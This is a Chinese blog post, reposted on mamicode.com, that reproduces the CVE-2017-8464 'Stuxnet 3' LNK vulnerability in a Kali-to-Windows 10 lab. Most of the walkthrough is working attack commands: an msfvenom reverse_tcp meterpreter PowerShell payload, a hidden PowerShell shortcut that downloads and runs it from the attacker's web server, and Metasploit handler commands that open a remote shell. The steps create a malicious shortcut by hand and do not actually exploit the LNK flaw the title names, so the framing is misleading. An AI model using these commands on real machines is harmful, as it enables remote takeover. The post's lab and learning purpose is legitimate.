码迷,mamicode.com
首页 > 其他好文 > 详细

震网三代漏洞复现

时间:2017-08-29 23:52:08      阅读:443      评论:0      收藏:0      [点我收藏+]

标签:client   代码   管理器   二进制文件   pac   html   文件的   后门   hid   

一、  CVE-2017-8464远程命令执行漏洞(震网三代漏洞)复现

漏洞描述:

攻击者可以向用户呈现包含恶意的.LNK文件和相关联的恶意二进制文件的可移动驱动器或远程共享。当用户在Windows资源管理器或解析.LNK文件 的任何其他应用程序中打开此驱动器(或远程共享)时,恶意二进制程序将在目标系统上执行攻击者选择的代码,成功利用此漏洞的攻击者可以获得与本地用户相同 的用户权限。

注释:.LNK是windows系统内应用程序快捷方式文件的文件类型后缀名。

漏洞影响范围:

  • Microsoft Windows 10 Version 1607 for 32-bit Systems
  • Microsoft Windows 10 Version 1607 for x64-based Systems
  • Microsoft Windows 10 for 32-bit Systems
  • Microsoft Windows 10 for x64-based Systems
  • Microsoft Windows 10 version 1511 for 32-bit Systems
  • Microsoft Windows 10 version 1511 for x64-based Systems
  • Microsoft Windows 10 version 1703 for 32-bit Systems
  • Microsoft Windows 10 version 1703 for x64-based Systems
  • Microsoft Windows 7 for 32-bit Systems SP1
  • Microsoft Windows 7 for x64-based Systems SP1
  • Microsoft Windows 8.1 for 32-bit Systems
  • Microsoft Windows 8.1 for x64-based Systems
  • Microsoft Windows RT 8.1

服务器系统

  • Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1
  • Microsoft Windows Server 2008 R2 for x64-based Systems SP1
  • Microsoft Windows Server 2008 for 32-bit Systems SP2
  • Microsoft Windows Server 2008 for Itanium-based Systems SP2
  • Microsoft Windows Server 2008 for x64-based Systems SP2
  • Microsoft Windows Server 2012
  • Microsoft Windows Server 2012 R2
  • Microsoft Windows Server 2016

漏洞复现:

利用原理:

创建恶意快捷方式,包含恶意执行脚本,点击恶意快捷方式,导致本机中病毒。

环境搭建:

攻击机:Kali-Linux-2017.1-vm-amd64     IP:192.168.18.250

靶机:Windows 10 Version 1703(x64)   IP:192.168.18.112

复现过程:

kali下生成一个反弹的ps1的shell:

msfvenom  -p   windows/x64/meterpreter/reverse_tcp  lhost=192.168.18.250   lport=5555  -f  psh-reflection>/opt/search.ps1

结果如图1.1所示。

技术分享

切换到opt目录,然后查看到已生成了search.ps1 的powershell 后门

技术分享

将生成的search.ps1拷贝到/var/www/html目录下 

技术分享

启动apache服务

 技术分享

访问web下的search.ps1,可以直接访问:

 技术分享

在靶机上创建一个powershell远程快捷:

powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.18.250/search.ps1‘);test.ps1"

 技术分享

名称为:powershell.exe

 技术分享

kali下创建监听反弹,并且可以看到成功反弹出靶机的shell:

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
show options

技术分享

set LHOST 192.168.18.250
set LPORT 5555  

技术分享

exploit        开始监听
在靶机上运行新建的powershell快捷方式,即可反弹shell,结果如下图所示。

技术分享

 


 

震网三代漏洞复现

标签:client   代码   管理器   二进制文件   pac   html   文件的   后门   hid   

原文地址:http://www.cnblogs.com/peterpan0707007/p/7450786.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!